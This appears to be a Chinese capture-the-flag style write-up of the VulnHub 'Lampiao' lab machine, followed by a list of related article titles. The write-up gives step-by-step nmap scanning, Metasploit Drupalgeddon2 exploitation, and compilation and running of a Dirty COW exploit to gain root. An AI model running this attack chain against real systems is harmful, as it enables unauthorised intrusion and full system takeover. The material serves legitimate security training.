通过vulnhub平台搭建靶场

靶机地址:Vulnerable By Design - Search: lampiao ~ VulnHub

靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip

下载完成后,双击Lampiao.ovf运行

启动靶机后,默认是不给用户名、密码和IP地址的

通过查看kali自身的IP地址,如下图,确定当前靶机也在192.168.200下,使用nmap进行C段扫描

nmap扫描192.168.200.0/24

首先我们使用nmap的sP参数通过ping探测已存活的主机

nmap -sP 192.168.200.0/24

扫描192.168.200.152的端口

nmap -p1-65535 192.168.200.152

访问192.168.200.152:1898

启动msf,通过msf搜索所有关于Drupal的漏洞

使用exploit/unix/webapp/drupal_drupalgeddon2

show options查看所需参数

设置目标地址和目标端口

set rhost 192.168.200.152

set rport 1898

exploit进行攻击,并返回meterpreter会话

查看当前用户为www-data

上传漏洞收集脚本到目标主机赋予执行权限并执行

下载地址:GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool

upload /home/kali/桌面/linux-exploit-suggester.sh /tmp/1.sh

进入目标主机的/tmp目录,查看上传的1.sh是否存在

赋予1.sh执行权限

chmod +x 1.sh 

运行1.sh,发现该靶机存在脏牛漏洞

上传漏洞收集脚本到目标主机赋予执行权限并执行

exp下载地址:https://codeload.github.com/gbonacini/CVE-2016-5195/zip/refs/heads/master

退出shell交互模式,返回meterpreter会话,将脚本上传至目标地址

upload /home/kali/桌面/dcow.cpp /tmp/dcow.cpp

进入shell交互,编译exp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

开启py终端,运行./dcow,获取密码

python -c 'import pty; pty.spawn("/bin/bash")'

登录root用户,查看当前权限

用户名:root

密码:dirtyCowFun

Linux脏牛漏洞提权相关推荐

  1. Linux脏牛漏洞提权复现

    操作系统: Linux ( CentOS 6.5) Web服务: PHP+Apache 环境搭建 第一步,配置yum源,安装PHP 进入yum目录 cd /etc/yum.repos.d/ 创建文件夹 ...

  2. 【内网—权限提升】——linux本地提权_脏牛漏洞提权

    文章目录 一.实验目的: 二.工具: 三.实验环境: 四.漏洞说明: 1. 原理: 2. 漏洞成因: 五.环境准备: 1. 安装Apache及php环境: 2. 安装gcc编译器(C语言编译器): 2 ...

  3. Linux利用脏牛漏洞提权

    实验环境:Centos6.5.ssh 实验步骤: 一.搭建实验环境 1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpd ...

  4. DAY28:Linux、Windows 系统提权

    DAY28:Linux.Windows 系统提权 1.Linux 系统提权 1.1.Linux 系统版本 linux发行版本: • centos • redhat • ubuntu • kali 1. ...

  5. 脏牛Linux本地提权漏洞复现(CVE-2016-5195、Linux、Android、提权)

    漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞 ...

  6. Ubuntu内核提权(CVE-2017-16995)漏洞的复现脏牛漏洞

    Ubuntu内核提权漏洞的复现 这里先介绍一下漏洞,Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux .近期有白帽子爆出 ubuntu 的最新版本 ...

  7. linux “大脏牛”漏洞分析(CVE-2017-1000405)

    一.背景简介 脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android.桌面版和服务器版都受到其影响.恶意攻击者通过该漏洞可以轻易 ...

  8. 103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.LINUX 内核漏洞提权 1.漏洞背景: 2.漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME ...

  9. android local root,脏牛漏洞影响范围超出想象,以后所有Android手机都能被Root?

    原标题:脏牛漏洞影响范围超出想象,以后所有Android手机都能被Root? [新朋友]点击标题下面蓝字「皮鲁安全之家」关注 [老朋友]点击右上角,分享或收藏本页精彩内容 [公众号]搜索公众号:皮鲁安 ...

  10. linux 负数_linux内核提权系列教程(2):任意地址读写到提权的4种方法

    一.漏洞代码分析 代码见arbitrary.h. 1.功能函数介绍 功能 输入结构名 输入结构 功能 ARBITRARY_RW_INIT init_args size 初始化全局对象,存于g_mem_ ...

最新文章

  1. C笔记(2014-12备份)
  2. python 遍历删除
  3. 【学习笔记】22、读写文件(I/O操作)— 读文件
  4. 遇到填报无计可施?一文讲透自由表填报,数据分析效率直线提升
  5. python leetcode_python实现leetcode中无重复字符的最长字串
  6. Win下执行Swing程序的BAT文件 和 Linux下执行Swing程序的SH文件
  7. Linux 网络相关命令
  8. 属性动画基础之ValueAnimator
  9. python做var模型_【Python金融量化】VaR系列(五):Copula模型估计组合VaR-阿里云开发者社区...
  10. memcache两种客户端比较
  11. POJ 1325 Machine Schedule(zoj 1364) 最小覆盖数
  12. java里pom.xml是啥意思_maven中pom.xml详细介绍
  13. 鼎信通达gsm网关和asterisk对接的调试
  14. 音视频即时通讯解决方案
  15. C盘 html后缀 删,磁盘清理c盘的后果是什么?
  16. 插上移动硬盘计算机没反应,移动硬盘插电脑没反应怎么办解决教程
  17. IOS开发把汉字转换成拼音的两种方法和返回拼音首字母
  18. 美橙互联域名转入万网 美橙互联域名转入万网
  19. python编程实现人民币和美元的互相转换_java人民币转换美元的实验报告
  20. 学习笔记(05):Mysql数据库基础入门视频教程-自连接

热门文章

  1. [Err] 1146 [Err] 1682
  2. No administrator rights detected!
  3. 基于MATLAB的指纹识别系统仿真设计,基于Matlab的指纹识别系统的研究与实现
  4. c语言编程猪八戒吃西瓜,儿童故事:猪八戒吃西瓜
  5. 下载B站、秒拍等视频网站视频
  6. Android对抗反编译,非科班程序员求职经历分享
  7. Transportation Research(TR)系列主编汇总
  8. n9005zhuenb6 Android 5,三星Galaxy Note3(港版N9005)刷机与ROOT教程【详细介绍】
  9. 上计算机课睡觉检讨书400,课堂上睡觉检讨书范文
  10. 综述:生成自动驾驶的高精地图技术(3)